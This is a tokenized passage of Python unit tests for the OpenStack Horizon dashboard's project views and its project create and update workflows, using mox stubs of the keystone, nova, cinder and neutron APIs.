<s> import copy <EOL> import datetime <EOL> import logging <EOL> import os <EOL> import django <EOL> from django . core . urlresolvers import reverse <EOL> from django import http <EOL> from django . utils import timezone <EOL> from django . utils import unittest <EOL> from mox import IgnoreArg <EOL> from mox import IsA <EOL> from horizon import exceptions <EOL> from horizon . workflows import views <EOL> from openstack_dashboard import api <EOL> from openstack_dashboard . dashboards . identity . projects import workflows <EOL> from openstack_dashboard . test import helpers as test <EOL> from openstack_dashboard import usage <EOL> from openstack_dashboard . usage import quotas <EOL> with_sel = os . environ . get ( '<STR_LIT>' , False ) <EOL> if with_sel : <EOL> from selenium . webdriver import ActionChains <EOL> from selenium . webdriver . common import keys <EOL> from socket import timeout as socket_timeout <EOL> INDEX_URL = reverse ( '<STR_LIT>' ) <EOL> USER_ROLE_PREFIX = workflows . PROJECT_GROUP_MEMBER_SLUG + "<STR_LIT>" <EOL> GROUP_ROLE_PREFIX = workflows . PROJECT_USER_MEMBER_SLUG + "<STR_LIT>" <EOL> class TenantsViewTests ( test . BaseAdminViewTests ) : <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , ) } ) <EOL> def test_index ( self ) : <EOL> api . keystone . tenant_list ( IsA ( http . HttpRequest ) , <EOL> domain = None , <EOL> paginate = True , <EOL> marker = None ) . AndReturn ( [ self . tenants . list ( ) , False ] ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( INDEX_URL ) <EOL> self . assertTemplateUsed ( res , '<STR_LIT>' ) <EOL> self . assertItemsEqual ( res . context [ '<STR_LIT>' ] . data , self . tenants . list ( ) ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , ) } ) <EOL> def test_index_with_domain_context ( self ) : <EOL> domain = self . domains . get ( id = "<STR_LIT:1>" ) <EOL> self . setSessionValues ( domain_context = domain . id , <EOL> domain_context_name = domain . 
name ) <EOL> domain_tenants = [ tenant for tenant in self . tenants . list ( ) <EOL> if tenant . domain_id == domain . id ] <EOL> api . keystone . tenant_list ( IsA ( http . HttpRequest ) , <EOL> domain = domain . id , <EOL> paginate = True , <EOL> marker = None ) . AndReturn ( [ domain_tenants , False ] ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( INDEX_URL ) <EOL> self . assertTemplateUsed ( res , '<STR_LIT>' ) <EOL> self . assertItemsEqual ( res . context [ '<STR_LIT>' ] . data , domain_tenants ) <EOL> self . assertContains ( res , "<STR_LIT>" ) <EOL> class ProjectsViewNonAdminTests ( test . TestCase ) : <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , ) } ) <EOL> def test_index ( self ) : <EOL> api . keystone . tenant_list ( IsA ( http . HttpRequest ) , <EOL> user = self . user . id , <EOL> paginate = True , <EOL> marker = None , <EOL> admin = False ) . AndReturn ( [ self . tenants . list ( ) , False ] ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( INDEX_URL ) <EOL> self . assertTemplateUsed ( res , '<STR_LIT>' ) <EOL> self . assertItemsEqual ( res . context [ '<STR_LIT>' ] . data , self . tenants . list ( ) ) <EOL> class CreateProjectWorkflowTests ( test . BaseAdminViewTests ) : <EOL> def _get_project_info ( self , project ) : <EOL> domain = self . _get_default_domain ( ) <EOL> project_info = { "<STR_LIT:name>" : project . name , <EOL> "<STR_LIT:description>" : project . description , <EOL> "<STR_LIT>" : project . enabled , <EOL> "<STR_LIT>" : domain . id } <EOL> return project_info <EOL> def _get_workflow_fields ( self , project ) : <EOL> domain = self . _get_default_domain ( ) <EOL> project_info = { "<STR_LIT>" : domain . id , <EOL> "<STR_LIT>" : domain . name , <EOL> "<STR_LIT:name>" : project . name , <EOL> "<STR_LIT:description>" : project . description , <EOL> "<STR_LIT>" : project . enabled } <EOL> return project_info <EOL> def _get_quota_info ( self , quota ) : <EOL> cinder_quota = self . 
cinder_quotas . first ( ) <EOL> neutron_quota = self . neutron_quotas . first ( ) <EOL> quota_data = { } <EOL> for field in quotas . NOVA_QUOTA_FIELDS : <EOL> quota_data [ field ] = int ( quota . get ( field ) . limit ) <EOL> for field in quotas . CINDER_QUOTA_FIELDS : <EOL> quota_data [ field ] = int ( cinder_quota . get ( field ) . limit ) <EOL> for field in quotas . NEUTRON_QUOTA_FIELDS : <EOL> quota_data [ field ] = int ( neutron_quota . get ( field ) . limit ) <EOL> return quota_data <EOL> def _get_workflow_data ( self , project , quota ) : <EOL> project_info = self . _get_workflow_fields ( project ) <EOL> quota_data = self . _get_quota_info ( quota ) <EOL> project_info . update ( quota_data ) <EOL> return project_info <EOL> def _get_default_domain ( self ) : <EOL> default_domain = self . domain <EOL> domain = { "<STR_LIT:id>" : self . request . session . get ( '<STR_LIT>' , <EOL> default_domain . id ) , <EOL> "<STR_LIT:name>" : self . request . session . get ( '<STR_LIT>' , <EOL> default_domain . name ) } <EOL> return api . base . APIDictWrapper ( domain ) <EOL> def _get_all_users ( self , domain_id ) : <EOL> if not domain_id : <EOL> users = self . users . list ( ) <EOL> else : <EOL> users = [ user for user in self . users . list ( ) <EOL> if user . domain_id == domain_id ] <EOL> return users <EOL> def _get_all_groups ( self , domain_id ) : <EOL> if not domain_id : <EOL> groups = self . groups . list ( ) <EOL> else : <EOL> groups = [ group for group in self . groups . list ( ) <EOL> if group . domain_id == domain_id ] <EOL> return groups <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> api . base : ( '<STR_LIT>' , ) , <EOL> api . neutron : ( '<STR_LIT>' , ) , <EOL> quotas : ( '<STR_LIT>' , ) } ) <EOL> def test_add_project_get ( self ) : <EOL> quota = self . quotas . first ( ) <EOL> default_role = self . roles . first ( ) <EOL> default_domain = self . 
_get_default_domain ( ) <EOL> domain_id = default_domain . id <EOL> users = self . _get_all_users ( domain_id ) <EOL> groups = self . _get_all_groups ( domain_id ) <EOL> roles = self . roles . list ( ) <EOL> api . base . is_service_enabled ( IsA ( http . HttpRequest ) , '<STR_LIT>' ) . MultipleTimes ( ) . AndReturn ( True ) <EOL> api . base . is_service_enabled ( IsA ( http . HttpRequest ) , '<STR_LIT>' ) . MultipleTimes ( ) . AndReturn ( True ) <EOL> api . keystone . get_default_domain ( IsA ( http . HttpRequest ) ) . AndReturn ( default_domain ) <EOL> api . neutron . is_extension_supported ( <EOL> IsA ( http . HttpRequest ) , '<STR_LIT>' ) . AndReturn ( True ) <EOL> quotas . get_default_quota_data ( IsA ( http . HttpRequest ) ) . AndReturn ( quota ) <EOL> api . keystone . get_default_role ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( default_role ) <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( users ) <EOL> api . keystone . role_list ( IsA ( http . HttpRequest ) ) . AndReturn ( roles ) <EOL> api . keystone . group_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( groups ) <EOL> api . keystone . role_list ( IsA ( http . HttpRequest ) ) . AndReturn ( roles ) <EOL> self . mox . ReplayAll ( ) <EOL> url = reverse ( '<STR_LIT>' ) <EOL> res = self . client . get ( url ) <EOL> self . assertTemplateUsed ( res , views . WorkflowView . template_name ) <EOL> self . assertContains ( res , '<STR_LIT>' <EOL> '<STR_LIT>' , html = True ) <EOL> workflow = res . context [ '<STR_LIT>' ] <EOL> self . assertEqual ( res . context [ '<STR_LIT>' ] . name , <EOL> workflows . CreateProject . name ) <EOL> step = workflow . get_step ( "<STR_LIT>" ) <EOL> self . assertEqual ( step . action . initial [ '<STR_LIT>' ] , quota . get ( '<STR_LIT>' ) . limit ) <EOL> self . assertEqual ( step . action . initial [ '<STR_LIT>' ] , <EOL> quota . get ( '<STR_LIT>' ) . limit ) <EOL> self . 
assertQuerysetEqual ( <EOL> workflow . steps , <EOL> [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> def test_add_project_get_domain ( self ) : <EOL> domain = self . domains . get ( id = "<STR_LIT:1>" ) <EOL> self . setSessionValues ( domain_context = domain . id , <EOL> domain_context_name = domain . name ) <EOL> self . test_add_project_get ( ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> api . neutron : ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> quotas : ( '<STR_LIT>' , ) } ) <EOL> @ test . update_settings ( OPENSTACK_NEUTRON_NETWORK = { '<STR_LIT>' : True } ) <EOL> def test_add_project_get_with_neutron ( self ) : <EOL> quota = self . quotas . first ( ) <EOL> neutron_quotas = self . neutron_quotas . first ( ) <EOL> quotas . get_default_quota_data ( IsA ( http . HttpRequest ) ) . AndReturn ( quota ) <EOL> api . neutron . is_extension_supported ( IsA ( http . HttpRequest ) , '<STR_LIT>' ) . MultipleTimes ( ) . AndReturn ( True ) <EOL> api . neutron . is_extension_supported ( <EOL> IsA ( http . HttpRequest ) , '<STR_LIT>' ) . AndReturn ( True ) <EOL> api . neutron . tenant_quota_get ( IsA ( http . HttpRequest ) , <EOL> tenant_id = self . tenant . id ) . AndReturn ( neutron_quotas ) <EOL> api . keystone . get_default_role ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( self . roles . first ( ) ) <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , domain = None ) . AndReturn ( self . users . list ( ) ) <EOL> api . keystone . role_list ( IsA ( http . HttpRequest ) ) . AndReturn ( self . roles . list ( ) ) <EOL> api . keystone . group_list ( IsA ( http . HttpRequest ) , domain = None ) . AndReturn ( self . groups . list ( ) ) <EOL> api . keystone . role_list ( IsA ( http . HttpRequest ) ) . AndReturn ( self . roles . list ( ) ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . 
get ( reverse ( '<STR_LIT>' ) ) <EOL> self . assertTemplateUsed ( res , views . WorkflowView . template_name ) <EOL> if django . VERSION >= ( <NUM_LIT:1> , <NUM_LIT:6> ) : <EOL> self . assertContains ( res , '''<STR_LIT>''' , html = True ) <EOL> else : <EOL> self . assertContains ( res , '''<STR_LIT>''' , html = True ) <EOL> workflow = res . context [ '<STR_LIT>' ] <EOL> self . assertEqual ( res . context [ '<STR_LIT>' ] . name , <EOL> workflows . CreateProject . name ) <EOL> step = workflow . get_step ( "<STR_LIT>" ) <EOL> self . assertEqual ( step . action . initial [ '<STR_LIT>' ] , quota . get ( '<STR_LIT>' ) . limit ) <EOL> self . assertEqual ( step . action . initial [ '<STR_LIT>' ] , <EOL> neutron_quotas . get ( '<STR_LIT>' ) . limit ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> quotas : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , ) , <EOL> api . cinder : ( '<STR_LIT>' , ) , <EOL> api . nova : ( '<STR_LIT>' , ) } ) <EOL> def test_add_project_post ( self , neutron = False ) : <EOL> project = self . tenants . first ( ) <EOL> quota = self . quotas . first ( ) <EOL> default_role = self . roles . first ( ) <EOL> default_domain = self . _get_default_domain ( ) <EOL> domain_id = default_domain . id <EOL> users = self . _get_all_users ( domain_id ) <EOL> groups = self . _get_all_groups ( domain_id ) <EOL> roles = self . roles . list ( ) <EOL> quotas . get_disabled_quotas ( IsA ( http . HttpRequest ) ) . AndReturn ( self . disabled_quotas . first ( ) ) <EOL> if neutron : <EOL> quotas . get_disabled_quotas ( IsA ( http . HttpRequest ) ) . AndReturn ( self . disabled_quotas . first ( ) ) <EOL> quotas . get_default_quota_data ( IsA ( http . HttpRequest ) ) . AndReturn ( quota ) <EOL> api . keystone . get_default_role ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( default_role ) <EOL> api . 
keystone . user_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( users ) <EOL> api . keystone . role_list ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( roles ) <EOL> api . keystone . group_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( groups ) <EOL> project_details = self . _get_project_info ( project ) <EOL> quota_data = self . _get_quota_info ( quota ) <EOL> api . keystone . tenant_create ( IsA ( http . HttpRequest ) , ** project_details ) . AndReturn ( project ) <EOL> workflow_data = { } <EOL> for role in roles : <EOL> if USER_ROLE_PREFIX + role . id in workflow_data : <EOL> ulist = workflow_data [ USER_ROLE_PREFIX + role . id ] <EOL> for user_id in ulist : <EOL> api . keystone . add_tenant_user_role ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id , <EOL> user = user_id , <EOL> role = role . id ) <EOL> for role in roles : <EOL> if GROUP_ROLE_PREFIX + role . id in workflow_data : <EOL> ulist = workflow_data [ GROUP_ROLE_PREFIX + role . id ] <EOL> for group_id in ulist : <EOL> api . keystone . add_group_role ( IsA ( http . HttpRequest ) , <EOL> role = role . id , <EOL> group = group_id , <EOL> project = self . tenant . id ) <EOL> nova_updated_quota = dict ( [ ( key , quota_data [ key ] ) for key in <EOL> quotas . NOVA_QUOTA_FIELDS ] ) <EOL> api . nova . tenant_quota_update ( IsA ( http . HttpRequest ) , <EOL> project . id , <EOL> ** nova_updated_quota ) <EOL> cinder_updated_quota = dict ( [ ( key , quota_data [ key ] ) for key in <EOL> quotas . CINDER_QUOTA_FIELDS ] ) <EOL> api . cinder . tenant_quota_update ( IsA ( http . HttpRequest ) , <EOL> project . id , <EOL> ** cinder_updated_quota ) <EOL> self . mox . ReplayAll ( ) <EOL> workflow_data . update ( self . _get_workflow_data ( project , quota ) ) <EOL> url = reverse ( '<STR_LIT>' ) <EOL> res = self . client . post ( url , workflow_data ) <EOL> self . assertNoFormErrors ( res ) <EOL> self . 
assertRedirectsNoFollow ( res , INDEX_URL ) <EOL> def test_add_project_post_domain ( self ) : <EOL> domain = self . domains . get ( id = "<STR_LIT:1>" ) <EOL> self . setSessionValues ( domain_context = domain . id , <EOL> domain_context_name = domain . name ) <EOL> self . test_add_project_post ( ) <EOL> @ test . create_stubs ( { api . neutron : ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) } ) <EOL> @ test . update_settings ( OPENSTACK_NEUTRON_NETWORK = { '<STR_LIT>' : True } ) <EOL> def test_add_project_post_with_neutron ( self ) : <EOL> quota_data = self . neutron_quotas . first ( ) <EOL> neutron_updated_quota = dict ( [ ( key , quota_data . get ( key ) . limit ) <EOL> for key in quotas . NEUTRON_QUOTA_FIELDS ] ) <EOL> api . neutron . is_extension_supported ( <EOL> IsA ( http . HttpRequest ) , '<STR_LIT>' ) . AndReturn ( True ) <EOL> api . neutron . is_extension_supported ( IsA ( http . HttpRequest ) , '<STR_LIT>' ) . MultipleTimes ( ) . AndReturn ( True ) <EOL> api . neutron . tenant_quota_update ( IsA ( http . HttpRequest ) , <EOL> self . tenant . id , <EOL> ** neutron_updated_quota ) <EOL> self . test_add_project_post ( neutron = True ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> quotas : ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) } ) <EOL> def test_add_project_quota_defaults_error ( self ) : <EOL> default_role = self . roles . first ( ) <EOL> default_domain = self . _get_default_domain ( ) <EOL> domain_id = default_domain . id <EOL> users = self . _get_all_users ( domain_id ) <EOL> groups = self . _get_all_groups ( domain_id ) <EOL> roles = self . roles . list ( ) <EOL> api . keystone . get_default_domain ( IsA ( http . HttpRequest ) ) . AndReturn ( default_domain ) <EOL> quotas . get_disabled_quotas ( IsA ( http . HttpRequest ) ) . AndReturn ( self . disabled_quotas . first ( ) ) <EOL> quotas . get_default_quota_data ( IsA ( http . HttpRequest ) ) . AndRaise ( self . 
exceptions . nova ) <EOL> api . keystone . get_default_role ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( default_role ) <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( users ) <EOL> api . keystone . role_list ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( roles ) <EOL> api . keystone . group_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( groups ) <EOL> self . mox . ReplayAll ( ) <EOL> url = reverse ( '<STR_LIT>' ) <EOL> res = self . client . get ( url ) <EOL> self . assertTemplateUsed ( res , views . WorkflowView . template_name ) <EOL> self . assertContains ( res , "<STR_LIT>" ) <EOL> def test_add_project_quota_defaults_error_domain ( self ) : <EOL> domain = self . domains . get ( id = "<STR_LIT:1>" ) <EOL> self . setSessionValues ( domain_context = domain . id , <EOL> domain_context_name = domain . name ) <EOL> self . test_add_project_quota_defaults_error ( ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> quotas : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) } ) <EOL> def test_add_project_tenant_create_error ( self ) : <EOL> project = self . tenants . first ( ) <EOL> quota = self . quotas . first ( ) <EOL> default_role = self . roles . first ( ) <EOL> default_domain = self . _get_default_domain ( ) <EOL> domain_id = default_domain . id <EOL> users = self . _get_all_users ( domain_id ) <EOL> groups = self . _get_all_groups ( domain_id ) <EOL> roles = self . roles . list ( ) <EOL> api . keystone . get_default_domain ( IsA ( http . HttpRequest ) ) . AndReturn ( default_domain ) <EOL> quotas . get_disabled_quotas ( IsA ( http . HttpRequest ) ) . AndReturn ( self . disabled_quotas . first ( ) ) <EOL> quotas . get_default_quota_data ( IsA ( http . HttpRequest ) ) . AndReturn ( quota ) <EOL> api . keystone . 
get_default_role ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( default_role ) <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( users ) <EOL> api . keystone . role_list ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( roles ) <EOL> api . keystone . group_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( groups ) <EOL> project_details = self . _get_project_info ( project ) <EOL> api . keystone . tenant_create ( IsA ( http . HttpRequest ) , ** project_details ) . AndRaise ( self . exceptions . keystone ) <EOL> self . mox . ReplayAll ( ) <EOL> workflow_data = self . _get_workflow_data ( project , quota ) <EOL> url = reverse ( '<STR_LIT>' ) <EOL> res = self . client . post ( url , workflow_data ) <EOL> self . assertNoFormErrors ( res ) <EOL> self . assertRedirectsNoFollow ( res , INDEX_URL ) <EOL> def test_add_project_tenant_create_error_domain ( self ) : <EOL> domain = self . domains . get ( id = "<STR_LIT:1>" ) <EOL> self . setSessionValues ( domain_context = domain . id , <EOL> domain_context_name = domain . name ) <EOL> self . test_add_project_tenant_create_error ( ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> quotas : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> api . nova : ( '<STR_LIT>' , ) } ) <EOL> def test_add_project_quota_update_error ( self ) : <EOL> project = self . tenants . first ( ) <EOL> quota = self . quotas . first ( ) <EOL> default_role = self . roles . first ( ) <EOL> default_domain = self . _get_default_domain ( ) <EOL> domain_id = default_domain . id <EOL> users = self . _get_all_users ( domain_id ) <EOL> groups = self . _get_all_groups ( domain_id ) <EOL> roles = self . roles . list ( ) <EOL> api . keystone . get_default_domain ( IsA ( http . HttpRequest ) ) . 
AndReturn ( default_domain ) <EOL> quotas . get_disabled_quotas ( IsA ( http . HttpRequest ) ) . AndReturn ( self . disabled_quotas . first ( ) ) <EOL> quotas . get_default_quota_data ( IsA ( http . HttpRequest ) ) . AndReturn ( quota ) <EOL> api . keystone . get_default_role ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( default_role ) <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( users ) <EOL> api . keystone . role_list ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( roles ) <EOL> api . keystone . group_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( groups ) <EOL> project_details = self . _get_project_info ( project ) <EOL> quota_data = self . _get_quota_info ( quota ) <EOL> api . keystone . tenant_create ( IsA ( http . HttpRequest ) , ** project_details ) . AndReturn ( project ) <EOL> workflow_data = { } <EOL> for role in roles : <EOL> if USER_ROLE_PREFIX + role . id in workflow_data : <EOL> ulist = workflow_data [ USER_ROLE_PREFIX + role . id ] <EOL> for user_id in ulist : <EOL> api . keystone . add_tenant_user_role ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id , <EOL> user = user_id , <EOL> role = role . id ) <EOL> for role in roles : <EOL> if GROUP_ROLE_PREFIX + role . id in workflow_data : <EOL> ulist = workflow_data [ GROUP_ROLE_PREFIX + role . id ] <EOL> for group_id in ulist : <EOL> api . keystone . add_group_role ( IsA ( http . HttpRequest ) , <EOL> role = role . id , <EOL> group = group_id , <EOL> project = self . tenant . id ) <EOL> nova_updated_quota = dict ( [ ( key , quota_data [ key ] ) for key in <EOL> quotas . NOVA_QUOTA_FIELDS ] ) <EOL> api . nova . tenant_quota_update ( IsA ( http . HttpRequest ) , <EOL> project . id , <EOL> ** nova_updated_quota ) . AndRaise ( self . exceptions . nova ) <EOL> self . mox . ReplayAll ( ) <EOL> workflow_data . update ( self . 
_get_workflow_data ( project , quota ) ) <EOL> url = reverse ( '<STR_LIT>' ) <EOL> res = self . client . post ( url , workflow_data ) <EOL> self . assertNoFormErrors ( res ) <EOL> self . assertRedirectsNoFollow ( res , INDEX_URL ) <EOL> def test_add_project_quota_update_error_domain ( self ) : <EOL> domain = self . domains . get ( id = "<STR_LIT:1>" ) <EOL> self . setSessionValues ( domain_context = domain . id , <EOL> domain_context_name = domain . name ) <EOL> self . test_add_project_quota_update_error ( ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> quotas : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> api . cinder : ( '<STR_LIT>' , ) , <EOL> api . nova : ( '<STR_LIT>' , ) } ) <EOL> def test_add_project_user_update_error ( self ) : <EOL> project = self . tenants . first ( ) <EOL> quota = self . quotas . first ( ) <EOL> default_role = self . roles . first ( ) <EOL> default_domain = self . _get_default_domain ( ) <EOL> domain_id = default_domain . id <EOL> users = self . _get_all_users ( domain_id ) <EOL> groups = self . _get_all_groups ( domain_id ) <EOL> roles = self . roles . list ( ) <EOL> api . keystone . get_default_domain ( IsA ( http . HttpRequest ) ) . AndReturn ( default_domain ) <EOL> quotas . get_disabled_quotas ( IsA ( http . HttpRequest ) ) . AndReturn ( self . disabled_quotas . first ( ) ) <EOL> quotas . get_default_quota_data ( IsA ( http . HttpRequest ) ) . AndReturn ( quota ) <EOL> api . keystone . get_default_role ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( default_role ) <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( users ) <EOL> api . keystone . role_list ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( roles ) <EOL> api . keystone . group_list ( IsA ( http . 
HttpRequest ) , domain = domain_id ) . AndReturn ( groups ) <EOL> project_details = self . _get_project_info ( project ) <EOL> quota_data = self . _get_quota_info ( quota ) <EOL> api . keystone . tenant_create ( IsA ( http . HttpRequest ) , ** project_details ) . AndReturn ( project ) <EOL> workflow_data = { } <EOL> for role in roles : <EOL> if USER_ROLE_PREFIX + role . id in workflow_data : <EOL> ulist = workflow_data [ USER_ROLE_PREFIX + role . id ] <EOL> for user_id in ulist : <EOL> api . keystone . add_tenant_user_role ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id , <EOL> user = user_id , <EOL> role = role . id ) . AndRaise ( self . exceptions . keystone ) <EOL> break <EOL> break <EOL> nova_updated_quota = dict ( [ ( key , quota_data [ key ] ) for key in <EOL> quotas . NOVA_QUOTA_FIELDS ] ) <EOL> api . nova . tenant_quota_update ( IsA ( http . HttpRequest ) , <EOL> project . id , <EOL> ** nova_updated_quota ) <EOL> cinder_updated_quota = dict ( [ ( key , quota_data [ key ] ) for key in <EOL> quotas . CINDER_QUOTA_FIELDS ] ) <EOL> api . cinder . tenant_quota_update ( IsA ( http . HttpRequest ) , <EOL> project . id , <EOL> ** cinder_updated_quota ) <EOL> self . mox . ReplayAll ( ) <EOL> workflow_data . update ( self . _get_workflow_data ( project , quota ) ) <EOL> url = reverse ( '<STR_LIT>' ) <EOL> res = self . client . post ( url , workflow_data ) <EOL> self . assertNoFormErrors ( res ) <EOL> self . assertRedirectsNoFollow ( res , INDEX_URL ) <EOL> def test_add_project_user_update_error_domain ( self ) : <EOL> domain = self . domains . get ( id = "<STR_LIT:1>" ) <EOL> self . setSessionValues ( domain_context = domain . id , <EOL> domain_context_name = domain . name ) <EOL> self . test_add_project_user_update_error ( ) <EOL> @ test . create_stubs ( { api . 
keystone : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> quotas : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) } ) <EOL> def test_add_project_missing_field_error ( self ) : <EOL> project = self . tenants . first ( ) <EOL> quota = self . quotas . first ( ) <EOL> default_role = self . roles . first ( ) <EOL> default_domain = self . _get_default_domain ( ) <EOL> domain_id = default_domain . id <EOL> users = self . _get_all_users ( domain_id ) <EOL> groups = self . _get_all_groups ( domain_id ) <EOL> roles = self . roles . list ( ) <EOL> api . keystone . get_default_domain ( IsA ( http . HttpRequest ) ) . AndReturn ( default_domain ) <EOL> quotas . get_disabled_quotas ( IsA ( http . HttpRequest ) ) . AndReturn ( self . disabled_quotas . first ( ) ) <EOL> quotas . get_default_quota_data ( IsA ( http . HttpRequest ) ) . AndReturn ( quota ) <EOL> api . keystone . get_default_role ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( default_role ) <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( users ) <EOL> api . keystone . role_list ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( roles ) <EOL> api . keystone . group_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( groups ) <EOL> self . mox . ReplayAll ( ) <EOL> workflow_data = self . _get_workflow_data ( project , quota ) <EOL> workflow_data [ "<STR_LIT:name>" ] = "<STR_LIT>" <EOL> url = reverse ( '<STR_LIT>' ) <EOL> res = self . client . post ( url , workflow_data ) <EOL> self . assertContains ( res , "<STR_LIT>" ) <EOL> def test_add_project_missing_field_error_domain ( self ) : <EOL> domain = self . domains . get ( id = "<STR_LIT:1>" ) <EOL> self . setSessionValues ( domain_context = domain . id , <EOL> domain_context_name = domain . name ) <EOL> self . test_add_project_missing_field_error ( ) <EOL> class UpdateProjectWorkflowTests ( test . 
BaseAdminViewTests ) : <EOL> def _get_quota_info ( self , quota ) : <EOL> cinder_quota = self . cinder_quotas . first ( ) <EOL> neutron_quota = self . neutron_quotas . first ( ) <EOL> quota_data = { } <EOL> for field in quotas . NOVA_QUOTA_FIELDS : <EOL> quota_data [ field ] = int ( quota . get ( field ) . limit ) <EOL> for field in quotas . CINDER_QUOTA_FIELDS : <EOL> quota_data [ field ] = int ( cinder_quota . get ( field ) . limit ) <EOL> for field in quotas . NEUTRON_QUOTA_FIELDS : <EOL> quota_data [ field ] = int ( neutron_quota . get ( field ) . limit ) <EOL> return quota_data <EOL> def _get_all_users ( self , domain_id ) : <EOL> if not domain_id : <EOL> users = self . users . list ( ) <EOL> else : <EOL> users = [ user for user in self . users . list ( ) <EOL> if user . domain_id == domain_id ] <EOL> return users <EOL> def _get_all_groups ( self , domain_id ) : <EOL> if not domain_id : <EOL> groups = self . groups . list ( ) <EOL> else : <EOL> groups = [ group for group in self . groups . list ( ) <EOL> if group . domain_id == domain_id ] <EOL> return groups <EOL> def _get_proj_users ( self , project_id ) : <EOL> return [ user for user in self . users . list ( ) <EOL> if user . project_id == project_id ] <EOL> def _get_proj_groups ( self , project_id ) : <EOL> return [ group for group in self . groups . list ( ) <EOL> if group . project_id == project_id ] <EOL> def _get_proj_role_assignment ( self , project_id ) : <EOL> project_scope = { '<STR_LIT>' : { '<STR_LIT:id>' : project_id } } <EOL> return self . role_assignments . filter ( scope = project_scope ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , 